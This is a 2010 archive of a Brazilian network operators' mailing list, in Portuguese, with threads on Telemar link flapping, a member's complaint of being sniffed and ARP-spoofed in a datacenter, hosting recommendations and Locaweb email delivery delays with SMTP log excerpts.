assim, um servi?o online >> hoje precisa ter um servidor em SP na Telef?nica, uma liga??o com a >> BrT (AS 8167) e presen?a em alguma cidade da Oi que n?o SP, como Rio, >> BH ou Salvador. > > Compreendo perfeitamente Rubens, tive que tirar meu servidor desta > configura??o, pois fui sniffado dentro do Data Center de uma empresa a > qual n?o vou citar o nome e tive meus dados roubados. Estou entrando > com processo contra eles por perdas e danos e pretendo nunca mais > trabalhar com empresas que s? tem nome e marketing. No momento n?o > disponho de verba para aquisi??o de outra LP de Dados pois o custo > aqui no interior ? ainda muito elevado. Estou me baseando no fato de > que se antes funcionava perfeitamente, porque agora come?ou estes > problemas ? > > []'s > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > -- Sds. Alexandre Jeronimo Correa S?cio-Administrador Onda Internet www.onda.net.br IPV6 Ready ! www.ipv6.onda.net.br From rubensk at gmail.com Wed Sep 15 21:09:15 2010 From: rubensk at gmail.com (Rubens Kuhl) Date: Wed, 15 Sep 2010 21:09:15 -0300 Subject: [MASOCH-L] =?iso-8859-1?q?=5BURG=CANTE=5D_Algu=E9m_da_Telemar?= In-Reply-To: <0AA802EAF6B84B82A965158F1DFE9EC2@VictorPC> References: <5C5409E79B7D46E5BF4DCE018A3884E8@VictorPC> <42611.187.59.120.96.1284589106.squirrel@www.openline.com.br> <0AA802EAF6B84B82A965158F1DFE9EC2@VictorPC> Message-ID: > Compreendo perfeitamente Rubens, tive que tirar meu servidor desta > configura??o, pois fui sniffado dentro do Data Center de uma empresa a qual > n?o vou citar o nome e tive meus dados roubados. Estou entrando com processo > contra eles por perdas e danos e pretendo nunca mais trabalhar com empresas > que s? tem nome e marketing. No momento n?o disponho de verba para aquisi??o > de outra LP de Dados pois o custo aqui no interior ? ainda muito elevado. A sugest?o foi de colocar servidores em datacenters mesmo... n?o ? porque um ? pilantra que se deva deixar de usar essa fam?lia de solu??es. > Estou me baseando no fato de que se antes funcionava perfeitamente, porque > agora come?ou estes problemas ? A 2a. lei da termodin?mica diz que todos os sistemas tendem naturalmente ao caos... seria mais surpreendete um sistema que n?o tivesse problemas! Rubens From kolt at frag.com.br Wed Sep 15 21:42:41 2010 From: kolt at frag.com.br (Guilherme Boing) Date: Wed, 15 Sep 2010 21:42:41 -0300 Subject: [MASOCH-L] =?iso-8859-1?q?=5BURG=CANTE=5D_Algu=E9m_da_Telemar?= In-Reply-To: References: <5C5409E79B7D46E5BF4DCE018A3884E8@VictorPC> <42611.187.59.120.96.1284589106.squirrel@www.openline.com.br> <0AA802EAF6B84B82A965158F1DFE9EC2@VictorPC> Message-ID: Posta na GTER que voc? tem mais chances de alguem da Telemar ler... Isso ai ta parecendo alguma interface l? na Telemar flapando.. From victor_volpe at bol.com.br Thu Sep 16 01:25:17 2010 From: victor_volpe at bol.com.br (Victor) Date: Thu, 16 Sep 2010 01:25:17 -0300 Subject: [MASOCH-L] =?iso-8859-1?q?=5BURG=CANTE=5D_Algu=E9m_da_Telemar?= In-Reply-To: References: <5C5409E79B7D46E5BF4DCE018A3884E8@VictorPC><42611.187.59.120.96.1284589106.squirrel@www.openline.com.br><0AA802EAF6B84B82A965158F1DFE9EC2@VictorPC> Message-ID: > A sugest?o foi de colocar servidores em datacenters mesmo... n?o ? > porque um ? pilantra que se deva deixar de usar essa fam?lia > de solu??es. Pra quem nunca teve seus dados e senhas roubadas ? f?cil aceitar uma resposta dessa. A quest?o n?o ? ter pilantras, pois isso tem em todo lugar, a quest?o ? o Data Center n?o ter seguran?a dentro da pr?pria rede. Aonde j? se viu permitir uso de ferramentas de seguran?a/auditoria dentro de uma rede repleta de clientes e dados sigilosos trafegando. Completa falta de compet?ncia e respeito com o consumidor. Ao meu ver, cada cliente deveria ter uma VLAN no SWITCH, dificultando esses sniffers, mas fazer o que n?... vamos ver a hora que chegar a intima??o judicial se eles n?o v?o se mexer. Boa sorte pra quem usa *** Host. Travadas de porta no SWITCH que voc? achava que era normal no seu dedicado, pense duas vezes... l? a coisa ? de "primeira"... os clientes tem a chance de apreciar at? o seu gateway sendo SPOOFFADO. Nice ;) Aug 16 09:05:05 srvlinux01 kernel: bge0: link state changed to DOWN Aug 16 09:07:25 srvlinux01 kernel: bge0: link state changed to UP Aug 16 09:07:40 srvlinux01 kernel: bge0: link state changed to DOWN Aug 16 09:07:41 srvlinux01 kernel: bge0: link state changed to UP Aug 16 09:07:42 srvlinux01 kernel: bge0: link state changed to DOWN Aug 16 09:07:44 srvlinux01 kernel: bge0: link state changed to UP Aug 19 01:58:01 srvlinux01 kernel: bge0: link state changed to DOWN Aug 19 01:58:25 srvlinux01 kernel: bge0: link state changed to UP Aug 19 01:58:39 srvlinux01 kernel: bge0: link state changed to DOWN Aug 19 01:58:41 srvlinux01 kernel: bge0: link state changed to UP Aug 19 01:58:42 srvlinux01 kernel: bge0: link state changed to DOWN Aug 19 01:58:44 srvlinux01 kernel: bge0: link state changed to UP Aug 23 00:22:04 srvlinux01 kernel: bge0: link state changed to DOWN Aug 23 00:28:56 srvlinux01 kernel: bge0: link state changed to UP Aug 23 00:29:29 srvlinux01 kernel: arp: 189.14.***.*** moved from 00:02:ba:14:6c:11 to 00:06:28:97:8a:11 on bge0 Desculpem mas o que aconteceu foi inadmiss?vel e n?o consigo esconder a minha indigna??o com a empresa. Sei que muitos usam servi?os em Data Centers, por isso fica a dica, usem sempre SSL/TLS, seja em FTP, SMTP, POP3, HTTP, etc. Nunca se sabe quem est? te "monitorando". []'s From carlos at greco.com.br Thu Sep 16 07:18:11 2010 From: carlos at greco.com.br (Carlos A.. Greco) Date: Thu, 16 Sep 2010 07:18:11 -0300 (GMT-03:00) Subject: [MASOCH-L] Hospedagem WEB Message-ID: <458000460.915511284632291056.JavaMail.root@gi4.greco.com.br> Se quizerem podemos iniciar uso compartilhado de servidores. Tenho um rack no datacenter da telefonica com espaco de sobra. Greco Com o www.mailflex.com.br voce pode usar seus e-mails e agenda, no escritorio em casa ou no celular. Enviado por celular. ----- Mensagem Original ----- De: Renato Pinheiro de Souza Enviada: quarta-feira, 15 de setembro de 2010 16:58 Para: Mail Aid and Succor, On-line Comfort and Help Assunto: Re: [MASOCH-L] Hospedagem WEB -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Se puder gastar US$ 50 / ano por conta, Google Apps (http://www.google.com/apps/intl/en/business/index.html) para os emails. Uso em v?rios clientes e funciona muito bem. []s, Renato Pinheiro renato.pinheiro at pobox.com pinheiro at gmail.com On 15/09/10 15:42, Roberto Bert? wrote: > Boa tarde, > > Esta ocorrendo um movimento do setor a respeito disso, acompanhem no Twitter > > http://search.twitter.com/search?q=%23hostsbrasil > > > 2010/9/15 manoel Wanderley > >> Pode usar a WB Internet que ? muito boa. Tem hospedagem em linux e >> windows, com CPANEL >> www.wb.com.br >> SDs >> Manoel Wanderley >> manoel at vetor.com.br >> >> Srs, >>> >>> Algu?m tem dicas ou impress?es sobre empresas nacionais de hosting? >>> Est?vamos na Locaweb mas cancelei por m? qualidade dos servi?os de email. >>> Migrei para hostgator, mas em 3 dias j? observei diversas >>> instabilidades nos servi?os de email. >>> >>> Estou vendo a Kinghost, mas j? vi q tem muitas reclama??es tbm. >>> >>> Algu?m tem alguma dica? >>> >>> Grato >>> >>> Bruno Camargo >>> >>> -- >>> BrCaBadT >>> __ >>> masoch-l list >>> https://eng.registro.br/mailman/listinfo/masoch-l >>> >>> >> __ >> masoch-l list >> https://eng.registro.br/mailman/listinfo/masoch-l >> > > > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEcBAEBAgAGBQJMkSVTAAoJEI9mFb9uQqk5b6QH/1shZvXBvmcAkF7+P/nr/f1k FyPUMDrPOsXSG7rLwC9UOaqgaLJddvT8ems1H9A9wHQmJot4wNuCwsBywzGSj3Nr /V01aVH9xWFS0sLGbib8NMQmlZPXWfaRGJP+27T6Df62QbYSsrlDLPc1l+VhQRYH sZzReCWI53iJ9jmlDxWwcwAFuvHaSASsnNMJrNRWchA6uLwcnqCs7fh7MXYLRw+P 0asjCyF19pJet9pLtgs13eu6/NORuLx13H8bu0UPgaA8dD3k9EMK2P+XcUNCHAm2 RSmKY28JEwsgXrwp3Oj8Y6aAYM3DNIDNiIq7LtcmE85R12KZykT+LUXhArmiiUM= =xRkq -----END PGP SIGNATURE----- __ masoch-l list https://eng.registro.br/mailman/listinfo/masoch-l From hidekinakamura at gmail.com Fri Sep 17 09:28:46 2010 From: hidekinakamura at gmail.com (Hideki Nakamura) Date: Fri, 17 Sep 2010 09:28:46 -0300 Subject: [MASOCH-L] Locaweb - Problemas com E-mails Message-ID: Bom a todos, Por favor, preciso que algu?m da Locaweb entre em contato comigo pois estou com s?rios problemas de e-mails a quase 5 dias. Os meios convencionais de suporte n?o funcionaram. A situa??o est? cr?tica e o helpdesk simplesmente n?o est? dando conta do recado...... Segundo o Painel de Controle "Todos os servi?os est?o funcionando normalmente"... .. mas isso n?o ? verdade. Atraso (em todos os e-mails) de 12 horas ou mais... tenho e-mails enviando a 2 dias atr?s que n?o chegaram ainda... e nem voltram com mensagem de erro para o remetente.... O atraso j? ? complicado.... a sensa??o de estar perdendo e-mails ? pior ainda. Obrigado. Hideki From rejaine at bhz.jamef.com.br Fri Sep 17 09:45:01 2010 From: rejaine at bhz.jamef.com.br (Rejaine Monteiro) Date: Fri, 17 Sep 2010 09:45:01 -0300 Subject: [MASOCH-L] Locaweb - Problemas com E-mails In-Reply-To: References: Message-ID: <4C9362CD.1090301@bhz.jamef.com.br> Ol? Voc? tem acesso ao log da sess?o smtp? N?o sei se ? o caso, mas tive um problema semelhante recentemente, de atrasos tamb?m em envio de e-mail para um dominio hospedado l?, mas que estava sendo rejeitado temporariamente porque havia excedido o limite (qtde de conex?es/dia) por um mesmo remetente (ip) : "too many connections" . S? para deixar claro, n?o mandamos spam....rss Nossos usu?rios estavam tentando apenas responder e-mails de clientes. O problema ? que, devido a problemas ocorridos nos dias 11 a 13 desse m?s (falha na localweb, reportado inclusive no Status Blog), as mensagens ficaram em fila e quando os servi?os voltaram, as mensagens enfileiradas e acumuladas foram tantas que ao tentar entregar ultrapassaram o limite. Em 17-09-2010 09:28, Hideki Nakamura escreveu: > Bom a todos, > Por favor, preciso que algu?m da Locaweb entre em contato comigo pois > estou com s?rios problemas de e-mails a quase 5 dias. Os meios > convencionais de suporte n?o funcionaram. > > A situa??o est? cr?tica e o helpdesk simplesmente n?o est? dando conta > do recado...... Segundo o Painel de Controle "Todos os servi?os est?o > funcionando normalmente"... .. mas isso n?o ? verdade. > Atraso (em todos os e-mails) de 12 horas ou mais... tenho e-mails > enviando a 2 dias atr?s que n?o chegaram ainda... e nem voltram com > mensagem de erro para o remetente.... O atraso j? ? complicado.... a > sensa??o de estar perdendo e-mails ? pior ainda. > > Obrigado. > > Hideki > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > From rodrigo at rcbrasil.com.br Fri Sep 17 10:00:04 2010 From: rodrigo at rcbrasil.com.br (Rodrigo Ap. F. Tomazini) Date: Fri, 17 Sep 2010 10:00:04 -0300 Subject: [MASOCH-L] Locaweb - Problemas com E-mails In-Reply-To: References: Message-ID: Bom dia. N?s tivemos tantos problemas com emails na locaweb que acabamos transferindo os emasils para o google, que funciona muito bem e nunca mais tivemos problemas. Att. Em 17 de setembro de 2010 09:28, Hideki Nakamura escreveu: > Bom a todos, > Por favor, preciso que algu?m da Locaweb entre em contato comigo pois > estou com s?rios problemas de e-mails a quase 5 dias. Os meios > convencionais de suporte n?o funcionaram. > > A situa??o est? cr?tica e o helpdesk simplesmente n?o est? dando conta > do recado...... Segundo o Painel de Controle "Todos os servi?os est?o > funcionando normalmente"... .. mas isso n?o ? verdade. > Atraso (em todos os e-mails) de 12 horas ou mais... tenho e-mails > enviando a 2 dias atr?s que n?o chegaram ainda... e nem voltram com > mensagem de erro para o remetente.... O atraso j? ? complicado.... a > sensa??o de estar perdendo e-mails ? pior ainda. > > Obrigado. > > Hideki > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > -- Saiba mais sobre as solu??es SonicWALL http://www.sonicwall.com/br/TZ_Series.html http://www.sonicwall.com/br/295.html http://www.sonicwall.com/br/UTM_Firewall_VPN.html http://www.sonicwall.com/br/ -- Rodrigo Aparecido Fernandes Tomazini Analista de Suporte (18) 8114-8808 RC Brasil Vendas e Servi?os LTDA - ME http://www.rcbrasil.com.br/ (18) 3644-6222 RC Brasil Firewall agora ? Open Source, baixe, utilize, distribua e participe. http://rcbr-firewall.sourceforge.net/ From carlos at greco.com.br Fri Sep 17 10:04:39 2010 From: carlos at greco.com.br (Carlos Alberto Greco) Date: Fri, 17 Sep 2010 10:04:39 -0300 (GMT-03:00) Subject: [MASOCH-L] Locaweb - Problemas com E-mails In-Reply-To: Message-ID: <16997284.181284728840218.JavaMail.SYSTEM@carlos-pc> Se precisar de suporte ou mais de 50 contas, voc? deve contratar conta corporativa do gmail que custa $50 usu?rio/ano. Greco ----- Mensagem original ----- De: "Rodrigo Ap. F. Tomazini" Para: "Mail Aid and Succor, On-line Comfort and Help" Enviadas: Sexta-feira, 17 de Setembro de 2010 10:00:04 (GMT-0300) Auto-Detected Assunto: Re: [MASOCH-L] Locaweb - Problemas com E-mails Bom dia. N?s tivemos tantos problemas com emails na locaweb que acabamos transferindo os emasils para o google, que funciona muito bem e nunca mais tivemos problemas. Att. Em 17 de setembro de 2010 09:28, Hideki Nakamura escreveu: > Bom a todos, > Por favor, preciso que algu?m da Locaweb entre em contato comigo pois > estou com s?rios problemas de e-mails a quase 5 dias. Os meios > convencionais de suporte n?o funcionaram. > > A situa??o est? cr?tica e o helpdesk simplesmente n?o est? dando conta > do recado...... Segundo o Painel de Controle "Todos os servi?os est?o > funcionando normalmente"... .. mas isso n?o ? verdade. > Atraso (em todos os e-mails) de 12 horas ou mais... tenho e-mails > enviando a 2 dias atr?s que n?o chegaram ainda... e nem voltram com > mensagem de erro para o remetente.... O atraso j? ? complicado.... a > sensa??o de estar perdendo e-mails ? pior ainda. > > Obrigado. > > Hideki > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > -- Saiba mais sobre as solu??es SonicWALL http://www.sonicwall.com/br/TZ_Series.html http://www.sonicwall.com/br/295.html http://www.sonicwall.com/br/UTM_Firewall_VPN.html http://www.sonicwall.com/br/ -- Rodrigo Aparecido Fernandes Tomazini Analista de Suporte (18) 8114-8808 RC Brasil Vendas e Servi?os LTDA - ME http://www.rcbrasil.com.br/ (18) 3644-6222 RC Brasil Firewall agora ? Open Source, baixe, utilize, distribua e participe. http://rcbr-firewall.sourceforge.net/ __ masoch-l list https://eng.registro.br/mailman/listinfo/masoch-l -- Carlos Comercial www.greco.com.br (11) 3040.1000 - S?o Paulo Direto 3040-1001 acesse: blog.greco.com.br Tutoriais - Dicas - Suporte From leolistas at solutti.com.br Fri Sep 17 10:04:32 2010 From: leolistas at solutti.com.br (Leonardo Rodrigues) Date: Fri, 17 Sep 2010 10:04:32 -0300 Subject: [MASOCH-L] Locaweb - Problemas com E-mails In-Reply-To: References: Message-ID: <4C936760.9040806@solutti.com.br> 12 horas pra um email chegar ??? Infelizmente isso tem sido o 'tudo funcionando normalmente' da Locaweb nos ?ltimos tempos. ? uma pena, a Locaweb j? foi um ?timo provedor. Hoje n?o ? mais. Problema todo mundo tem, ningu?m ? perfeito. Mas a Locaweb t? tendo mais problema do que funcionando normal, n?o tem valido a indica??o mais. Pra hospedar web eu ainda indico. Mas pra email j? deixou de ser uma boa op??o a mais de ano. Em 17/09/2010 09:28, Hideki Nakamura escreveu: > Bom a todos, > Por favor, preciso que algu?m da Locaweb entre em contato comigo pois > estou com s?rios problemas de e-mails a quase 5 dias. Os meios > convencionais de suporte n?o funcionaram. > > A situa??o est? cr?tica e o helpdesk simplesmente n?o est? dando conta > do recado...... Segundo o Painel de Controle "Todos os servi?os est?o > funcionando normalmente"... .. mas isso n?o ? verdade. > Atraso (em todos os e-mails) de 12 horas ou mais... tenho e-mails > enviando a 2 dias atr?s que n?o chegaram ainda... e nem voltram com > mensagem de erro para o remetente.... O atraso j? ? complicado.... a > sensa??o de estar perdendo e-mails ? pior ainda. -- Atenciosamente / Sincerily, Leonardo Rodrigues Solutti Tecnologia http://www.solutti.com.br Minha armadilha de SPAM, N?O mandem email gertrudes at solutti.com.br My SPAMTRAP, do not email it From hidekinakamura at gmail.com Fri Sep 17 10:22:08 2010 From: hidekinakamura at gmail.com (Hideki Nakamura) Date: Fri, 17 Sep 2010 10:22:08 -0300 Subject: [MASOCH-L] Locaweb - Problemas com E-mails In-Reply-To: <4C9362CD.1090301@bhz.jamef.com.br> References: <4C9362CD.1090301@bhz.jamef.com.br> Message-ID: Bom dia Rejaine, Creio que n?o ? o caso. N?o tenho acesso ao log (pelo menos acho que n?o), mas os meus clientes enviam a mensagem e ela ? entregue na Locaweb (pois eu administro o e-mail dos meus clientes). Acontece que muitos desses sumiram !!! Atraso ? uma coisa.. mas e-mail se perderem ? altamente preocupante (dois dias atr?s eu mandei e-mails de gmail.com, hotmail.com e yahoo.com.br - at? agora n?o chegaram !!) Abri um chamado para o Ombusdman... e ele respondeu agora.. e me parece que come?ou a normalizar.... Obrigado pelo retorno ! 2010/9/17 Rejaine Monteiro : > > Ol? > > Voc? tem acesso ao log da sess?o smtp? N?o sei se ? o caso, mas tive um > problema semelhante recentemente, de atrasos tamb?m em envio de e-mail > para um dominio hospedado l?, mas que estava sendo rejeitado > temporariamente porque havia excedido o limite (qtde de conex?es/dia) > por um mesmo remetente (ip) : "too many connections" . S? para deixar > claro, n?o mandamos spam....rss Nossos usu?rios estavam tentando apenas > responder e-mails de clientes. O problema ? que, devido a problemas > ocorridos nos dias 11 a 13 desse m?s (falha na localweb, reportado > inclusive no Status Blog), as mensagens ficaram em fila e quando os > servi?os voltaram, as mensagens enfileiradas e acumuladas foram tantas > que ao tentar entregar ultrapassaram o limite. > > > Em 17-09-2010 09:28, Hideki Nakamura escreveu: >> Bom a todos, >> Por favor, preciso que algu?m da Locaweb entre em contato comigo pois >> estou com s?rios problemas de e-mails a quase 5 dias. Os meios >> convencionais de suporte n?o funcionaram. >> >> A situa??o est? cr?tica e o helpdesk simplesmente n?o est? dando conta >> do recado...... Segundo o Painel de Controle "Todos os servi?os est?o >> funcionando normalmente"... .. mas isso n?o ? verdade. >> Atraso (em todos os e-mails) de 12 horas ou mais... tenho e-mails >> enviando a 2 dias atr?s que n?o chegaram ainda... e nem voltram com >> mensagem de erro para o remetente.... O atraso j? ? complicado.... a >> sensa??o de estar perdendo e-mails ? pior ainda. >> >> Obrigado. >> >> Hideki >> __ >> masoch-l list >> https://eng.registro.br/mailman/listinfo/masoch-l >> > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > -- < Chinese - Language of God? "Coincid?ncias" entre os ideogramas chineses e a B?blia. http://students.washington.edu/cbsf/cool/Chinese.swf From algorges at gmail.com Fri Sep 17 10:22:23 2010 From: algorges at gmail.com (Alexandre Gorges) Date: Fri, 17 Sep 2010 10:22:23 -0300 Subject: [MASOCH-L] Locaweb - Problemas com E-mails In-Reply-To: <4C936760.9040806@solutti.com.br> Message-ID: Presto servi?o para v?rias empresas, e de 15 dias para c?, enviar emails para Locaweb demora muito. Eu acho que a Locaweb come?ou a usar greylist para frear a entradas dos emails. Na fila de emails do servidores acusa o seguinte: (host mx.a.locaweb.com.br[186.202.4.42] said: 450 4.7.1 : Recipient address rejected: you are sending too many mails, slow down... (in reply to RCPT TO command)) (host mx.a.locaweb.com.br[186.202.4.42] said: 450 4.7.1 : Recipient address rejected: you are sending too many mails, slow down... (in reply to RCPT TO command)) Os emails ficam na fila de envio por um per?odo muito alto at? ser enviado para a Locaweb. []'s Alexandre Gorges http://www.google.com.br/profiles/algorges MSN/Skype: alexandre at dag.net.br ICQ: 2031408 > From: Leonardo Rodrigues > Reply-To: Lista Masoch > Date: Fri, 17 Sep 2010 10:04:32 -0300 > To: Lista Masoch > Subject: Re: [MASOCH-L] Locaweb - Problemas com E-mails > > > 12 horas pra um email chegar ??? Infelizmente isso tem sido o 'tudo > funcionando normalmente' da Locaweb nos ?ltimos tempos. > > ? uma pena, a Locaweb j? foi um ?timo provedor. Hoje n?o ? mais. > Problema todo mundo tem, ningu?m ? perfeito. Mas a Locaweb t? tendo mais > problema do que funcionando normal, n?o tem valido a indica??o mais. > > Pra hospedar web eu ainda indico. Mas pra email j? deixou de ser > uma boa op??o a mais de ano. > > Em 17/09/2010 09:28, Hideki Nakamura escreveu: >> Bom a todos, >> Por favor, preciso que algu?m da Locaweb entre em contato comigo pois >> estou com s?rios problemas de e-mails a quase 5 dias. Os meios >> convencionais de suporte n?o funcionaram. >> >> A situa??o est? cr?tica e o helpdesk simplesmente n?o est? dando conta >> do recado...... Segundo o Painel de Controle "Todos os servi?os est?o >> funcionando normalmente"... .. mas isso n?o ? verdade. >> Atraso (em todos os e-mails) de 12 horas ou mais... tenho e-mails >> enviando a 2 dias atr?s que n?o chegaram ainda... e nem voltram com >> mensagem de erro para o remetente.... O atraso j? ? complicado.... a >> sensa??o de estar perdendo e-mails ? pior ainda. > > > -- > > > Atenciosamente / Sincerily, > Leonardo Rodrigues > Solutti Tecnologia > http://www.solutti.com.br > > Minha armadilha de SPAM, N?O mandem email > gertrudes at solutti.com.br > My SPAMTRAP, do not email it > > > > > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l From hidekinakamura at gmail.com Fri Sep 17 10:27:33 2010 From: hidekinakamura at gmail.com (Hideki Nakamura) Date: Fri, 17 Sep 2010 10:27:33 -0300 Subject: [MASOCH-L] Locaweb - Problemas com E-mails In-Reply-To: <4C936760.9040806@solutti.com.br> References: <4C936760.9040806@solutti.com.br> Message-ID: Pelo que os colegas falaram e pelo que tenho visto na Inter, esse ? um problema com e-mails est? cr?tico. Sou at? certo ponto bem paciente..... mas essa semana foi horr?vel. O pior n?o ? nem o atraso, mas o descaso.... e os pedidos de desculpas. Creio que nem uma explica??o do que realmente houve eu vou ter. Analisei a possibilidade de mudar para o Google... ainda estou analisando junto com outras op??es. N?o posso dizer que a Locaweb sempre foi um ruim. Alguns anos atr?s era muito bom... o suporte era ?gil, as informa??es eram claras.. e parecia que os atendentes sabiam o que estavam falando / fazendo. Hoje eu n?o tenho mais essa confian?a. At? pelo longo tempo de relacionamento tive paci?ncia at? agora. Mas de algum tempo pra c? est? insustent?vel......... Creio que n?o vai restar outra op??o a n?o ser mudar de provedor.... e juntamente levar aqueles que indiquei junto..... infelizmente, isso n?o vai fazer c?cegas no faturamento da Locaweb.... . Um colega meu disse "Tem que proibir de vender at? arrumar isso !!!" Obrigado a todos ! 2010/9/17 Leonardo Rodrigues : > > ? ?12 horas pra um email chegar ??? Infelizmente isso tem sido o 'tudo > funcionando normalmente' da Locaweb nos ?ltimos tempos. > > ? ?? uma pena, a Locaweb j? foi um ?timo provedor. Hoje n?o ? mais. Problema > todo mundo tem, ningu?m ? perfeito. Mas a Locaweb t? tendo mais problema do > que funcionando normal, n?o tem valido a indica??o mais. > > ? ?Pra hospedar web eu ainda indico. Mas pra email j? deixou de ser uma boa > op??o a mais de ano. > > Em 17/09/2010 09:28, Hideki Nakamura escreveu: >> >> Bom a todos, >> Por favor, preciso que algu?m da Locaweb entre em contato comigo pois >> estou com s?rios problemas de e-mails a quase 5 dias. Os meios >> convencionais de suporte n?o funcionaram. >> >> A situa??o est? cr?tica e o helpdesk simplesmente n?o est? dando conta >> do recado...... Segundo o Painel de Controle "Todos os servi?os est?o >> funcionando normalmente"... .. mas isso n?o ? verdade. >> Atraso (em todos os e-mails) de 12 horas ou mais... tenho e-mails >> enviando a 2 dias atr?s que n?o chegaram ainda... e nem voltram com >> mensagem de erro para o remetente.... O atraso j? ? complicado.... a >> sensa??o de estar perdendo e-mails ? pior ainda. > > > -- > > > ? ? ? ?Atenciosamente / Sincerily, > ? ? ? ?Leonardo Rodrigues > ? ? ? ?Solutti Tecnologia > ? ? ? ?http://www.solutti.com.br > > ? ? ? ?Minha armadilha de SPAM, N?O mandem email > ? ? ? ?gertrudes at solutti.com.br > ? ? ? ?My SPAMTRAP, do not email it > > > > > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > -- < Chinese - Language of God? "Coincid?ncias" entre os ideogramas chineses e a B?blia. http://students.washington.edu/cbsf/cool/Chinese.swf From rejaine at bhz.jamef.com.br Fri Sep 17 10:39:10 2010 From: rejaine at bhz.jamef.com.br (Rejaine Monteiro) Date: Fri, 17 Sep 2010 10:39:10 -0300 Subject: [MASOCH-L] Locaweb - Problemas com E-mails In-Reply-To: References: Message-ID: <4C936F7E.5010009@bhz.jamef.com.br> Alexandre, Exatamente isso que ocorre aqui (diferente da mensagem que postei anteriormente "too many connections", que foi um outro caso) A mensagem ? essa mesmo "too many mails, slown down"... Tenho v?rios casos desse no log hoje, por exemplo (no caso envio de e-mail nosso para a clientes locaweb) Em 17-09-2010 10:22, Alexandre Gorges escreveu: > Presto servi?o para v?rias empresas, e de 15 dias para c?, enviar emails > para Locaweb demora muito. > > Eu acho que a Locaweb come?ou a usar greylist para frear a entradas dos > emails. > Na fila de emails do servidores acusa o seguinte: > > (host mx.a.locaweb.com.br[186.202.4.42] said: 450 4.7.1 : > Recipient address rejected: you are sending too many mails, slow down... (in > reply to RCPT TO command)) > (host mx.a.locaweb.com.br[186.202.4.42] said: 450 4.7.1 : > Recipient address rejected: you are sending too many mails, slow down... (in > reply to RCPT TO command)) > > Os emails ficam na fila de envio por um per?odo muito alto at? ser enviado > para a Locaweb. > > > []'s > Alexandre Gorges > http://www.google.com.br/profiles/algorges > MSN/Skype: alexandre at dag.net.br > ICQ: 2031408 > > > > > >> From: Leonardo Rodrigues >> Reply-To: Lista Masoch >> Date: Fri, 17 Sep 2010 10:04:32 -0300 >> To: Lista Masoch >> Subject: Re: [MASOCH-L] Locaweb - Problemas com E-mails >> >> >> 12 horas pra um email chegar ??? Infelizmente isso tem sido o 'tudo >> funcionando normalmente' da Locaweb nos ?ltimos tempos. >> >> ? uma pena, a Locaweb j? foi um ?timo provedor. Hoje n?o ? mais. >> Problema todo mundo tem, ningu?m ? perfeito. Mas a Locaweb t? tendo mais >> problema do que funcionando normal, n?o tem valido a indica??o mais. >> >> Pra hospedar web eu ainda indico. Mas pra email j? deixou de ser >> uma boa op??o a mais de ano. >> >> Em 17/09/2010 09:28, Hideki Nakamura escreveu: >> >>> Bom a todos, >>> Por favor, preciso que algu?m da Locaweb entre em contato comigo pois >>> estou com s?rios problemas de e-mails a quase 5 dias. Os meios >>> convencionais de suporte n?o funcionaram. >>> >>> A situa??o est? cr?tica e o helpdesk simplesmente n?o est? dando conta >>> do recado...... Segundo o Painel de Controle "Todos os servi?os est?o >>> funcionando normalmente"... .. mas isso n?o ? verdade. >>> Atraso (em todos os e-mails) de 12 horas ou mais... tenho e-mails >>> enviando a 2 dias atr?s que n?o chegaram ainda... e nem voltram com >>> mensagem de erro para o remetente.... O atraso j? ? complicado.... a >>> sensa??o de estar perdendo e-mails ? pior ainda. >>> >> >> -- >> >> >> Atenciosamente / Sincerily, >> Leonardo Rodrigues >> Solutti Tecnologia >> http://www.solutti.com.br >> >> Minha armadilha de SPAM, N?O mandem email >> gertrudes at solutti.com.br >> My SPAMTRAP, do not email it >> >> >> >> >> __ >> masoch-l list >> https://eng.registro.br/mailman/listinfo/masoch-l >> > > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > From carlos at greco.com.br Fri Sep 17 10:59:13 2010 From: carlos at greco.com.br (Carlos Alberto Greco) Date: Fri, 17 Sep 2010 10:59:13 -0300 (GMT-03:00) Subject: [MASOCH-L] Locaweb - Problemas com E-mails In-Reply-To: <32989846.361284731463921.JavaMail.SYSTEM@carlos-pc> Message-ID: <28845813.421284732113593.JavaMail.SYSTEM@carlos-pc> Esse ? um grande problema que acaba sobrando para CIO de TI. Hoje o site da empresa at? pode ficar fora do ar, mas quando os e-mails param o suporte n?o para de receber liga??es. Participei no evento 6 edicao de outsourcing, o grande problema do pessoal de TI ? que al?m de ter que buscar o servi?o mais barato tem que funcionar. Para mudar essa forma de pensar do CEO ou melhor o dono da firma, o pessoal de TI tem que saber analisar e apresentar al?m do SLA, suporte, antivirus, antispam recursos que o servi?o de e-mail oferece e tamanho do fornecedor que deve ser mais agil na resolu??o do problema e ser pro ativo quando tem algum problema. A forma apresentada como uma solu??o ?, quantificar em valores todos esses beneficios apresentado principalmente o ganho de produtividade com as novas ferramentas e quanto vai custar para empresa os e-mails parado, com isso vc pode justificar o custo como um investimento que vai impactar diretamente no resultado da emrpesa. Greco diretoria Abranet ----- Mensagem original ----- De: "Leonardo Rodrigues" Para: "Mail Aid and Succor, On-line Comfort and Help" Enviadas: Sexta-feira, 17 de Setembro de 2010 10:04:32 (GMT-0300) Auto-Detected Assunto: Re: [MASOCH-L] Locaweb - Problemas com E-mails 12 horas pra um email chegar ??? Infelizmente isso tem sido o 'tudo funcionando normalmente' da Locaweb nos ?ltimos tempos. ? uma pena, a Locaweb j? foi um ?timo provedor. Hoje n?o ? mais. Problema todo mundo tem, ningu?m ? perfeito. Mas a Locaweb t? tendo mais problema do que funcionando normal, n?o tem valido a indica??o mais. Pra hospedar web eu ainda indico. Mas pra email j? deixou de ser uma boa op??o a mais de ano. Em 17/09/2010 09:28, Hideki Nakamura escreveu: > Bom a todos, > Por favor, preciso que algu?m da Locaweb entre em contato comigo pois > estou com s?rios problemas de e-mails a quase 5 dias. Os meios > convencionais de suporte n?o funcionaram. > > A situa??o est? cr?tica e o helpdesk simplesmente n?o est? dando conta > do 